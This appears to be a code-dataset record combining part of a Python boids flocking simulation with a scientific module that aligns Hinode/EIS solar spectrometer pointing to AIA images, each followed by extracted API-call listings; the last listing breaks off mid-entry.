# print(f"current pos: {self.pos[0]:0.4f}, {self.pos[1]:0.4f}")
# print(f"current vel: {self.vel[0]:0.4f}, {self.vel[1]:0.4f}")
if len(self.neighbours) >= 1:
ali = self.alignment(velocities)
coh = self.cohesion(positions)
sep = self.separation(positions)
self.vel[0] += (coh[0] + ali[0] + sep[0])
self.vel[1] += (coh[1] + ali[1] + sep[1])
# curl = perpendicular(self.vel)
# self.vel = vector_add(self.vel, list_divide(curl, 20))
if sqrt(self.vel[0]**2 + self.vel[1]**2) > self.max_speed:
new_v = normalise(self.vel, self.max_speed)
self.vel = new_v
self.pos[0] += self.vel[0]
self.pos[1] += self.vel[1]
self.wrap_world(world)
# print(f"new pos: {self.pos[0]:0.4f}, {self.pos[1]:0.4f}")
# print(f"new vel: {self.vel[0]:0.4f}, {self.vel[1]:0.4f}")
# print("-"*32)
class Boids():
"""
A Class to store the full set of Boid Class objects, along with associated
functions on all boids.
"""
def __init__(self, number, world, options):
self.num = number
self.world = world
self.members = []
self.positions = []
self.velocities = []
self.triangulation = None
self.max_speed = options['max_speed']
def add_boid(self, new_boid):
self.members.append(new_boid)
def generate_boids(self, options, distribution='random'):
"""
Set up the initial positions and velocities of the boids.
Parameters
----------
options : dict
Dictionary of setup options.
distribution : str, optional
Choose how the boids are initially distributed.
The default is 'random'. 'lattice' and 'lattice_with_noise' are
alternative options.
"""
if distribution == 'random':
positions = generate_values.random(self.num, self.world)
if distribution == 'lattice':
positions = generate_values.lattice(self.num, self.world)
if distribution == 'lattice_with_noise':
positions = generate_values.noisy_lattice(self.num, self.world)
velocities = generate_values.random_velocities(self.num, self.max_speed)
for i in range(self.num):
new_boid = Boid(i, positions[i], velocities[i], options)
self.add_boid(new_boid)
def get_pos_vel(self):
positions = []
velocities = []
for boid in self.members:
positions.append(boid.pos)
velocities.append(boid.vel)
self.positions = positions
self.velocities = velocities
def sort_boids(self):
"""
Perform a lexicographic sort on the boids by position.
"""
sorted_b = sorted(self.members, key=lambda b: [b.pos[0], b.pos[1]])
self.members = sorted_b
def triangulate_boids(self):
"""
Use the delauney_triangulation module to triangulate the set of boids.
"""
self.sort_boids()
self.get_pos_vel()
self.triangulation = triangulate(self.positions)
def setup_triangulate_boids(self):
"""
Set up the triangulation data without actually performing the Delaunay
triangulation algorithm. This is used for the MPI implementation
(in 'run_boids_mpi_cli.py') where there is a custom MPI triangulate
function.
"""
self.sort_boids()
self.get_pos_vel()
def make_neighbourhoods(self):
"""
Make neighbourhoods using the Delaunay triangulation module.
"""
points_seen = []
for edge in self.triangulation.edges:
if edge.org not in points_seen and not edge.deactivate:
connections = edge.find_connections(self.triangulation.edges)
self.members[edge.org].neighbours = connections
def make_neighbourhoods_basic(self, max_dist=5):
"""
Make neighbourhoods using the linear search algorithm.
"""
for member in self.members:
member.neighbours = []
for i, pos in enumerate(self.positions):
diff_x = pos[0] - member.pos[0]
diff_y = pos[1] - member.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if 0<distance<max_dist:
# print(i, member.pos, pos)
member.neighbours.append([member.index, i])
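# A minimal driving loop is sketched below. It only uses the classes defined in this
# module; the option values, flock size and world size are illustrative assumptions,
# not the settings used by the project's own run scripts.
if __name__ == '__main__':
    example_options = {
        'max_speed': 2.0,
        'field_of_view': 3.14,
        'vision_distance': 30,
        'safety_zone': 5,
        'alignment_perception': 0.05,
        'cohesion_perception': 0.005,
        'seperation_perception': 0.05,  # key spelling matches Boid.__init__
    }
    example_world = World([0, 200, 0, 200])
    flock = Boids(50, example_world, example_options)
    flock.generate_boids(example_options, distribution='random')
    for _ in range(100):
        # refresh the position/velocity lists, then build neighbourhoods
        flock.sort_boids()
        flock.get_pos_vel()
        flock.make_neighbourhoods_basic(max_dist=example_options['vision_distance'])
        for boid in flock.members:
            boid.update_boid(flock.positions, flock.velocities, example_world)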
|
[
"boids_core.generate_values.noisy_lattice",
"math.sqrt",
"delauney_triangulation.triangulation_core.triangulation.triangulate",
"numpy.asarray",
"boids_core.generate_values.random",
"boids_core.generate_values.lattice",
"math.atan2",
"delauney_triangulation.triangulation_core.linear_algebra.list_divide",
"delauney_triangulation.triangulation_core.linear_algebra.perpendicular",
"os.path.abspath",
"delauney_triangulation.triangulation_core.linear_algebra.normalise",
"boids_core.generate_values.random_velocities"
] |
[((261, 282), 'os.path.abspath', 'os.path.abspath', (['""".."""'], {}), "('..')\n", (276, 282), False, 'import sys, os\n'), ((2460, 2501), 'math.sqrt', 'sqrt', (['(self.vel[0] ** 2 + self.vel[1] ** 2)'], {}), '(self.vel[0] ** 2 + self.vel[1] ** 2)\n', (2464, 2501), False, 'from math import atan2, sqrt\n'), ((2546, 2577), 'math.atan2', 'atan2', (['self.vel[1]', 'self.vel[0]'], {}), '(self.vel[1], self.vel[0])\n', (2551, 2577), False, 'from math import atan2, sqrt\n'), ((3200, 3223), 'delauney_triangulation.triangulation_core.linear_algebra.perpendicular', 'perpendicular', (['offset_w'], {}), '(offset_w)\n', (3213, 3223), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3933, 3964), 'math.atan2', 'atan2', (['self.vel[0]', 'self.vel[1]'], {}), '(self.vel[0], self.vel[1])\n', (3938, 3964), False, 'from math import atan2, sqrt\n'), ((10256, 10315), 'boids_core.generate_values.random_velocities', 'generate_values.random_velocities', (['self.num', 'self.max_speed'], {}), '(self.num, self.max_speed)\n', (10289, 10315), True, 'import boids_core.generate_values as generate_values\n'), ((11227, 11254), 'delauney_triangulation.triangulation_core.triangulation.triangulate', 'triangulate', (['self.positions'], {}), '(self.positions)\n', (11238, 11254), False, 'from delauney_triangulation.triangulation_core.triangulation import triangulate\n'), ((3269, 3293), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_h', '(2)'], {}), '(offset_h, 2)\n', (3280, 3293), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3335, 3359), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_h', '(2)'], {}), '(offset_h, 2)\n', (3346, 3359), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3390, 3414), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_w', '(2)'], {}), '(offset_w, 2)\n', (3401, 3414), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3445, 3469), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_w', '(2)'], {}), '(offset_w, 2)\n', (3456, 3469), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((4141, 4194), 'math.atan2', 'atan2', (['(n_pos[0] - self.pos[0])', '(n_pos[1] - self.pos[1])'], {}), '(n_pos[0] - self.pos[0], n_pos[1] - self.pos[1])\n', (4146, 4194), False, 'from math import atan2, sqrt\n'), ((5139, 5170), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (5143, 5170), False, 'from math import atan2, sqrt\n'), ((9944, 9988), 'boids_core.generate_values.random', 'generate_values.random', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (9966, 9988), True, 'import boids_core.generate_values as generate_values\n'), ((10053, 10098), 'boids_core.generate_values.lattice', 'generate_values.lattice', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (10076, 10098), True, 'import boids_core.generate_values as generate_values\n'), ((10174, 10225), 'boids_core.generate_values.noisy_lattice', 
'generate_values.noisy_lattice', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (10203, 10225), True, 'import boids_core.generate_values as generate_values\n'), ((3498, 3522), 'numpy.asarray', 'np.asarray', (['[p1, p2, p3]'], {}), '([p1, p2, p3])\n', (3508, 3522), True, 'import numpy as np\n'), ((4554, 4585), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (4558, 4585), False, 'from math import atan2, sqrt\n'), ((8465, 8506), 'math.sqrt', 'sqrt', (['(self.vel[0] ** 2 + self.vel[1] ** 2)'], {}), '(self.vel[0] ** 2 + self.vel[1] ** 2)\n', (8469, 8506), False, 'from math import atan2, sqrt\n'), ((8546, 8581), 'delauney_triangulation.triangulation_core.linear_algebra.normalise', 'normalise', (['self.vel', 'self.max_speed'], {}), '(self.vel, self.max_speed)\n', (8555, 8581), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((12473, 12504), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (12477, 12504), False, 'from math import atan2, sqrt\n')]
|
#!/usr/bin/env python3
import datetime
import os
import warnings
import numpy as np
import scipy.interpolate as si
import matplotlib as mpl
from matplotlib.backends import backend_pdf
import matplotlib.pyplot as plt
from .utils import aia_raster
from .utils import cli
from .utils import eis
from .utils import num
from .utils import plots
from . import coregister as cr
class OptPointingVerif(object):
def __init__(self,
verif_dir, eis_name, aia_band,
pointings,
raster_builder, eis_int,
titles, ranges, offsets, cross_correlations,
start_time, stop_time,
):
''' Build and save pointing verification data
Parameters
==========
verif_dir : str
eis_name : str
aia_band : int
pointings : list of eis.EISPointing
raster_builder : aia_raster.SyntheticRasterBuilder
eis_int : 2D array
titles : list of str
ranges : list
Items can be either 3-tuples of cr.tools.OffsetSet, or None.
offsets : list
Items can be either 3-tuples of floats, or arrays of shape (n, 3).
cross_correlations : list of arrays
start_time : datetime.datetime
stop_time : datetime.datetime
'''
self.verif_dir = verif_dir
self.eis_name = eis_name
self.aia_band = aia_band
self.pointings = pointings
self.raster_builder = raster_builder
self.eis_int = eis_int
self.titles = titles
self.ranges = ranges
self.offsets = offsets
self.cross_correlations = cross_correlations
self.start_time = start_time
self.stop_time = stop_time
self.rms = []
if not os.path.exists(self.verif_dir):
os.makedirs(self.verif_dir)
def save_all(self):
self.save_npz()
self.save_figures()
self.save_summary()
def save_npz(self):
''' Save cc, offset, and new coordinates '''
np.savez(
os.path.join(self.verif_dir, 'offsets.npz'),
offset=np.array(self.offsets, dtype=object),
cc=np.array(self.cross_correlations, dtype=object),
x=self.pointings[-1].x, y=self.pointings[-1].y,
)
def save_summary(self):
''' Print and save yaml summary '''
if not self.rms:
self.rms = [None] * (len(self.titles) + 1)
run_specs = [
('verif_dir', self.verif_dir),
('initial_rms', self.rms[0]),
('steps', self._repr_steps(
self.titles,
self.ranges,
self.offsets,
self.cross_correlations,
self.rms[1:],
indent=2)),
('exec_time', self.stop_time - self.start_time),
]
summary = ''
for spec in run_specs:
summary += self._repr_kv(*spec, indent=0)
print('\n---\n', summary, '...', sep='')
with open(os.path.join(self.verif_dir, 'summary.yml'), 'w') as f:
f.write(summary)
def _repr_offset(self, offset):
offset = list(offset)
offset[0], offset[1] = offset[1], offset[0]
return offset
def _repr_kv(self, name, value, indent=0, sep=': ', end='\n'):
form = '{:#.6g}'
if isinstance(value, (list, tuple)):
value = [form.format(v)
if np.issubdtype(type(v), (float, np.inexact))
else str(v)
for v in value]
value = '[' + ', '.join(value) + ']'
if value is None:
value = 'null'
elif np.issubdtype(type(value), (float, np.inexact)):
value = form.format(value)
else:
value = str(value)
string = ''.join([indent * ' ', name, sep, str(value), end])
return string
def _repr_steps(self, titles, all_ranges, offsets, ccs, rmss, indent=0):
indent += 2
ret = '\n'
for name, ranges, offset, cc, rms in \
zip(titles, all_ranges, offsets, ccs, rmss):
ret += ' '*(indent-2) + '- '
ret += self._repr_kv('name', name, indent=0)
if ranges:
ry, rx, ra = ranges
ret += self._repr_kv('range_x', rx, indent=indent)
ret += self._repr_kv('range_y', ry, indent=indent)
ret += self._repr_kv('range_a', ra, indent=indent)
if len(offset) <= 3:
ret += self._repr_kv('offset', self._repr_offset(offset), indent=indent)
ret += self._repr_kv('cc_max', np.nanmax(cc), indent=indent)
if rms is not None:
ret += self._repr_kv('rms', rms, indent=indent)
if ret[-1] == '\n':
ret = ret[:-1]
return ret
def save_figures(self):
''' plot alignment results '''
diff_norm = mpl.colors.Normalize(vmin=-3, vmax=+3)
n_pointings = len(self.pointings)
for i, pointing in enumerate(self.pointings):
name = 'step_{}'.format(i)
if i == 0:
name += '_original'
elif i == n_pointings - 1:
name += '_optimal'
self.plot_intensity(pointing, name=name, diff_norm=diff_norm)
self.plot_slit_align()
def _get_interpolated_maps(self, pointing, save_to=None):
''' get maps and interpolate them on an evenly-spaced grid '''
x, y = pointing.x, pointing.y
aia_int = self.raster_builder.get_raster(
x, y, pointing.t / 3600,
extrapolate_t=True)
y_interp = np.linspace(y.min(), y.max(), y.shape[0])
x_interp = np.linspace(x.min(), x.max(), x.shape[1])
xi_interp = np.moveaxis(np.array(np.meshgrid(x_interp, y_interp)), 0, -1)
points = (x.flatten(), y.flatten())
eis_int_interp = si.LinearNDInterpolator(points, self.eis_int.flatten())
eis_int_interp = eis_int_interp(xi_interp)
aia_int_interp = si.LinearNDInterpolator(points, aia_int.flatten())
aia_int_interp = aia_int_interp(xi_interp)
if save_to:
np.savez(
save_to,
x=x,
y=y,
eis_int=self.eis_int,
aia_int=aia_int,
x_interp=x_interp,
y_interp=y_interp,
eis_int_interp=eis_int_interp,
aia_int_interp=aia_int_interp,
)
return x_interp, y_interp, eis_int_interp, aia_int_interp
def _normalize_intensity(self, a, b, norm=mpl.colors.Normalize):
def normalize(arr):
arr_stat = arr[~(arr == 0)] # exclude possibly missing AIA data
arr = (arr - np.nanmean(arr_stat)) / np.nanstd(arr_stat)
return arr
a = normalize(a)
b = normalize(b)
offset = - np.nanmin((a, b))
offset += .1
a += offset
b += offset
norm = norm(vmin=np.nanmin((a, b)), vmax=np.nanmax((a, b)))
return a, b, norm
def plot_intensity(self, pointing, name='', diff_norm=None):
''' plot intensity maps of EIS and AIA rasters '''
if name:
name = '_' + name
filenames = {
'npy': 'intensity_data{}.npz',
'intensity': 'intensity_maps{}.pdf',
'diff': 'intensity_diff{}.pdf',
}
filenames = {k: os.path.join(self.verif_dir, v.format(name))
for k, v in filenames.items()}
# build and save normalized intensity maps
x, y, eis_int, aia_int = self._get_interpolated_maps(
pointing, save_to=filenames['npy'])
eis_int, aia_int, norm = self._normalize_intensity(
eis_int, aia_int, mpl.colors.LogNorm)
# plot maps
pp = backend_pdf.PdfPages(filenames['intensity'])
intensity_plots = (
(eis_int, 'EIS'),
(aia_int, 'synthetic raster from AIA {}'.format(self.aia_band)),
)
for int_map, title in intensity_plots:
plt.clf()
plots.plot_map(
plt.gca(),
int_map, coordinates=[x, y],
cmap='gray', norm=norm)
plt.title(title)
plt.xlabel('X [arcsec]')
plt.ylabel('Y [arcsec]')
plt.savefig(pp)
pp.close()
# plot difference
diff = eis_int - aia_int
rms = np.sqrt(np.nanmean(diff**2))
self.rms.append(rms)
if not diff_norm:
vlim = np.nanmax(np.abs(diff))
diff_norm = mpl.colors.Normalize(vmin=-vlim, vmax=+vlim)
plt.clf()
im = plots.plot_map(
plt.gca(),
diff, coordinates=[x, y],
cmap='gray', norm=diff_norm)
cb = plt.colorbar(im)
cb.set_label('normalised EIS − AIA')
plt.title('RMS = {:.2g}'.format(rms))
plt.xlabel('X [arcsec]')
plt.ylabel('Y [arcsec]')
plt.savefig(filenames['diff'])
def _get_slit_offset(self):
slit_offsets = []
for offset in self.offsets:
if np.array(offset).ndim > 1:
slit_offsets.append(offset)
if len(slit_offsets) == 0:
return None
elif len(slit_offsets) > 1:
warnings.warn('Multiple slitshift steps. Plotting the first one')
return slit_offsets[0]
def plot_slit_align(self):
''' plot offsets and slit coordinates '''
slit_offset = self._get_slit_offset()
if slit_offset is None:
return
pp = backend_pdf.PdfPages(os.path.join(self.verif_dir, 'slit_align.pdf'))
x_color = '#2ca02c'
y_color = '#1f77b4'
old_color = '#d62728'
new_color = '#000000'
# offset
plt.clf()
plt.plot(slit_offset.T[1], '.', label='X', color=x_color)
plt.plot(slit_offset.T[0], '.', label='Y', color=y_color)
plt.title(self.eis_name)
plt.xlabel('slit position')
plt.ylabel('offset [arcsec]')
plt.legend()
plt.savefig(pp)
# new coordinates
plots = [
('X', self.pointings[-1].x, self.pointings[0].x),
('Y', self.pointings[-1].y, self.pointings[0].y),
]
for name, aligned, original in plots:
plt.clf()
plt.plot(original[0], ',', label='original ' + name, color=old_color)
plt.plot(aligned[0], ',', label='aligned ' + name, color=new_color)
plt.legend()
plt.title(self.eis_name)
plt.xlabel('slit position')
plt.ylabel(name + ' [arcsec]')
plt.savefig(pp)
pp.close()
def shift_step(x, y, eis_int, aia_int, cores=None, **kwargs):
cli.print_now('> correct translation')
x, y, offset = cr.images.align(
eis_int, x, y,
aia_int, x, y,
cores=cores, **kwargs)
y_offset, x_offset, cc = offset
offset = [y_offset, x_offset, 0]
offset_set = None
title = 'shift'
return title, offset_set, offset, cc, x, y
def rotshift_step(x, y, dates_rel_hours, eis_int, raster_builder,
cores=None, **kwargs):
cli.print_now('> align rasters')
x, y, offset = cr.rasters.align(
eis_int, x, y, dates_rel_hours, raster_builder,
cores=cores, **kwargs)
y_offset, x_offset, a_offset, cc = offset
offset = [y_offset, x_offset, a_offset]
offset_set = (kwargs['y_set'], kwargs['x_set'], kwargs['a_set'])
title = 'rotshift'
return title, offset_set, offset, cc, x, y
def slitshift_step(x, y, dates_rel_hours, eis_int, raster_builder,
cores=None, **kwargs):
cli.print_now('> align slit positions')
x, y, offset = cr.slits.align(
eis_int, x, y, dates_rel_hours, raster_builder,
cores=cores, **kwargs)
offset, cc = offset
offset_set = (kwargs['y_set'], kwargs['x_set'], kwargs['a_set'])
title = 'slitshift'
return title, offset_set, offset, cc, x, y
def optimal_pointing(eis_data, cores=None, aia_band=None,
verif_dir=None, aia_cache=None, eis_name=None, steps_file=None):
''' Determine the EIS pointing using AIA data as a reference.
Parameters
==========
eis_data : eis.EISData
Object containing the EIS intensity and pointing.
cores : int or None
Number of cores to use for multiprocessing, if any.
aia_band : int
The reference AIA channel, e.g. 193.
verif_dir : str
Path to the directory where to save verification plots.
aia_cache : str
Path to the synthetic AIA raster builder cache file.
eis_name : str
Name of the l0 EIS file, e.g. eis_l0_20140810_010438
steps_file : str
Path to a yaml file containing the registration steps.
Returns
=======
pointing : eis.EISPointing
Optimal EIS pointing.
'''
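# Typical call (argument values are illustrative, not prescribed by this module):
#   pointing = optimal_pointing(eis_data, cores=4, aia_band=193,
#                               verif_dir='verif', eis_name='eis_l0_20140810_010438',
#                               steps_file='coalign_steps.yml')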
if steps_file:
registration_steps = cli.load_corr_steps(steps_file)
else:
warnings.warn('No steps file provided, falling back to default.')
registration_steps = {'steps': [
{'type': 'shift',
'cc_function': 'explicit',
'cc_boundary': 'drop',
'sub_px': True,
},
{'type': 'rotshift',
'x_set': cr.tools.OffsetSet((-10.0, 10.0), number=11),
'y_set': cr.tools.OffsetSet((-5.0, 5.0), number=11),
'a_set': cr.tools.OffsetSet((-3.0, 3.0), step=0.2),
},
{'type': 'slitshift',
'x_set': cr.tools.OffsetSet((-20.0, 20.0), number=21),
'y_set': cr.tools.OffsetSet((-20.0, 20.0), number=21),
'a_set': cr.tools.OffsetSet((0.0, 0.0), number=1),
'mp_mode': 'track'
},
]}
cli.print_now('> build relative and absolute date arrays') # ----------------------
dates_rel = num.seconds_to_timedelta(eis_data.pointing.t)
dates_rel_hours = eis_data.pointing.t / 3600
date_ref = eis_data.pointing.t_ref
dates_abs = date_ref + dates_rel
cli.print_now('> get EIS grid info and add margin') # -----------------------------
x, y = eis_data.pointing.x, eis_data.pointing.y
x_margin = (np.max(x) - np.min(x)) / 2
y_margin = (np.max(y) - np.min(y)) / 2
x_margin = np.max(x_margin)
y_margin = np.max(y_margin)
ny, y_slice = cr.tools.create_margin(y, y_margin, 0)
nx, x_slice = cr.tools.create_margin(x, x_margin, 1)
new_shape = 1, ny, nx
new_slice = slice(None), y_slice, x_slice
eis_int = eis_data.data
cli.print_now('> get AIA data') # -------------------------------------------------
single_aia_frame = registration_steps.get('single_aia_frame', False)
if single_aia_frame:
single_aia_frame = num.dt_average(np.min(dates_abs), np.max(dates_abs))
aia_cache = None
raster_builder = aia_raster.SyntheticRasterBuilder(
dates=[np.min(dates_abs), np.max(dates_abs)],
date_ref=date_ref,
channel=aia_band,
file_cache=aia_cache,
single_frame=single_aia_frame,
)
raster_builder.get_data()
# degrade raster_builder resolution to 3 arcsec (see DelZanna+2011)
raster_builder.degrade_resolution(3, cores=cores)
# crop raster_builder cached data to fix multiprocessing
x_min, x_max = x.min(), x.max()
y_min, y_max = y.min(), y.max()
x_cen = (x_min + x_max) / 2
y_cen = (y_min + y_max) / 2
r = np.sqrt((x_max - x_cen)**2 + (y_max - y_cen)**2)
raster_builder.crop_data(x_cen - r, x_cen + r, y_cen - r, y_cen + r)
# compute alignment -------------------------------------------------------
titles = []
offset_sets = []
offsets = []
pointings = [eis_data.pointing]
cross_correlations = []
start_time = datetime.datetime.now()
for step in registration_steps['steps']:
registration_type = step.pop('type')
if registration_type == 'shift':
aia_int = raster_builder.get_raster(
x, y, dates_rel_hours,
extrapolate_t=True)
result = shift_step(x, y, eis_int, aia_int, cores=cores, **step)
elif registration_type == 'rotshift':
result = rotshift_step(x, y, dates_rel_hours,
eis_int, raster_builder,
cores=cores, **step)
elif registration_type == 'slitshift':
result = slitshift_step(x, y, dates_rel_hours,
eis_int, raster_builder,
cores=cores, **step)
else:
raise ValueError('unknown registration step')
title, offset_set, offset, cc, x, y = result
titles.append(title)
offset_sets.append(offset_set)
offsets.append(offset)
pointings.append(eis.EISPointing(x, y, eis_data.pointing.t, date_ref))
cross_correlations.append(cc)
stop_time = datetime.datetime.now()
if verif_dir:
verif = OptPointingVerif(
verif_dir, eis_name, aia_band,
pointings,
raster_builder, eis_int,
titles, offset_sets, offsets, cross_correlations,
start_time, stop_time,
)
verif.save_all()
return pointings[-1]
|
[
"numpy.sqrt",
"matplotlib.pyplot.ylabel",
"numpy.nanmean",
"numpy.array",
"numpy.nanmin",
"os.path.exists",
"numpy.savez",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.nanmax",
"numpy.min",
"warnings.warn",
"numpy.meshgrid",
"numpy.abs",
"numpy.nanstd",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.gca",
"matplotlib.colors.Normalize",
"matplotlib.pyplot.title",
"matplotlib.backends.backend_pdf.PdfPages",
"matplotlib.pyplot.legend",
"os.makedirs",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.colorbar",
"os.path.join",
"datetime.datetime.now"
] |
[((14319, 14335), 'numpy.max', 'np.max', (['x_margin'], {}), '(x_margin)\n', (14325, 14335), True, 'import numpy as np\n'), ((14351, 14367), 'numpy.max', 'np.max', (['y_margin'], {}), '(y_margin)\n', (14357, 14367), True, 'import numpy as np\n'), ((15480, 15532), 'numpy.sqrt', 'np.sqrt', (['((x_max - x_cen) ** 2 + (y_max - y_cen) ** 2)'], {}), '((x_max - x_cen) ** 2 + (y_max - y_cen) ** 2)\n', (15487, 15532), True, 'import numpy as np\n'), ((15819, 15842), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (15840, 15842), False, 'import datetime\n'), ((16900, 16923), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (16921, 16923), False, 'import datetime\n'), ((4917, 4955), 'matplotlib.colors.Normalize', 'mpl.colors.Normalize', ([], {'vmin': '(-3)', 'vmax': '(+3)'}), '(vmin=-3, vmax=+3)\n', (4937, 4955), True, 'import matplotlib as mpl\n'), ((7833, 7877), 'matplotlib.backends.backend_pdf.PdfPages', 'backend_pdf.PdfPages', (["filenames['intensity']"], {}), "(filenames['intensity'])\n", (7853, 7877), False, 'from matplotlib.backends import backend_pdf\n'), ((8664, 8673), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (8671, 8673), True, 'import matplotlib.pyplot as plt\n'), ((8818, 8834), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {}), '(im)\n', (8830, 8834), True, 'import matplotlib.pyplot as plt\n'), ((8934, 8958), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [arcsec]"""'], {}), "('X [arcsec]')\n", (8944, 8958), True, 'import matplotlib.pyplot as plt\n'), ((8967, 8991), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y [arcsec]"""'], {}), "('Y [arcsec]')\n", (8977, 8991), True, 'import matplotlib.pyplot as plt\n'), ((9000, 9030), 'matplotlib.pyplot.savefig', 'plt.savefig', (["filenames['diff']"], {}), "(filenames['diff'])\n", (9011, 9030), True, 'import matplotlib.pyplot as plt\n'), ((9818, 9827), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9825, 9827), True, 'import matplotlib.pyplot as plt\n'), ((9836, 9893), 'matplotlib.pyplot.plot', 'plt.plot', (['slit_offset.T[1]', '"""."""'], {'label': '"""X"""', 'color': 'x_color'}), "(slit_offset.T[1], '.', label='X', color=x_color)\n", (9844, 9893), True, 'import matplotlib.pyplot as plt\n'), ((9902, 9959), 'matplotlib.pyplot.plot', 'plt.plot', (['slit_offset.T[0]', '"""."""'], {'label': '"""Y"""', 'color': 'y_color'}), "(slit_offset.T[0], '.', label='Y', color=y_color)\n", (9910, 9959), True, 'import matplotlib.pyplot as plt\n'), ((9968, 9992), 'matplotlib.pyplot.title', 'plt.title', (['self.eis_name'], {}), '(self.eis_name)\n', (9977, 9992), True, 'import matplotlib.pyplot as plt\n'), ((10001, 10028), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""slit position"""'], {}), "('slit position')\n", (10011, 10028), True, 'import matplotlib.pyplot as plt\n'), ((10037, 10066), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""offset [arcsec]"""'], {}), "('offset [arcsec]')\n", (10047, 10066), True, 'import matplotlib.pyplot as plt\n'), ((10075, 10087), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10085, 10087), True, 'import matplotlib.pyplot as plt\n'), ((10096, 10111), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (10107, 10111), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13063), 'warnings.warn', 'warnings.warn', (['"""No steps file provided, falling back to default."""'], {}), "('No steps file provided, falling back to default.')\n", (13011, 13063), False, 'import warnings\n'), ((1759, 1789), 'os.path.exists', 'os.path.exists', 
(['self.verif_dir'], {}), '(self.verif_dir)\n', (1773, 1789), False, 'import os\n'), ((1803, 1830), 'os.makedirs', 'os.makedirs', (['self.verif_dir'], {}), '(self.verif_dir)\n', (1814, 1830), False, 'import os\n'), ((2044, 2087), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""offsets.npz"""'], {}), "(self.verif_dir, 'offsets.npz')\n", (2056, 2087), False, 'import os\n'), ((6165, 6340), 'numpy.savez', 'np.savez', (['save_to'], {'x': 'x', 'y': 'y', 'eis_int': 'self.eis_int', 'aia_int': 'aia_int', 'x_interp': 'x_interp', 'y_interp': 'y_interp', 'eis_int_interp': 'eis_int_interp', 'aia_int_interp': 'aia_int_interp'}), '(save_to, x=x, y=y, eis_int=self.eis_int, aia_int=aia_int, x_interp\n =x_interp, y_interp=y_interp, eis_int_interp=eis_int_interp,\n aia_int_interp=aia_int_interp)\n', (6173, 6340), True, 'import numpy as np\n'), ((6897, 6914), 'numpy.nanmin', 'np.nanmin', (['(a, b)'], {}), '((a, b))\n', (6906, 6914), True, 'import numpy as np\n'), ((8086, 8095), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (8093, 8095), True, 'import matplotlib.pyplot as plt\n'), ((8248, 8264), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (8257, 8264), True, 'import matplotlib.pyplot as plt\n'), ((8277, 8301), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [arcsec]"""'], {}), "('X [arcsec]')\n", (8287, 8301), True, 'import matplotlib.pyplot as plt\n'), ((8314, 8338), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y [arcsec]"""'], {}), "('Y [arcsec]')\n", (8324, 8338), True, 'import matplotlib.pyplot as plt\n'), ((8351, 8366), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (8362, 8366), True, 'import matplotlib.pyplot as plt\n'), ((8468, 8489), 'numpy.nanmean', 'np.nanmean', (['(diff ** 2)'], {}), '(diff ** 2)\n', (8478, 8489), True, 'import numpy as np\n'), ((8611, 8655), 'matplotlib.colors.Normalize', 'mpl.colors.Normalize', ([], {'vmin': '(-vlim)', 'vmax': '(+vlim)'}), '(vmin=-vlim, vmax=+vlim)\n', (8631, 8655), True, 'import matplotlib as mpl\n'), ((8715, 8724), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (8722, 8724), True, 'import matplotlib.pyplot as plt\n'), ((9629, 9675), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""slit_align.pdf"""'], {}), "(self.verif_dir, 'slit_align.pdf')\n", (9641, 9675), False, 'import os\n'), ((10352, 10361), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (10359, 10361), True, 'import matplotlib.pyplot as plt\n'), ((10374, 10443), 'matplotlib.pyplot.plot', 'plt.plot', (['original[0]', '""","""'], {'label': "('original ' + name)", 'color': 'old_color'}), "(original[0], ',', label='original ' + name, color=old_color)\n", (10382, 10443), True, 'import matplotlib.pyplot as plt\n'), 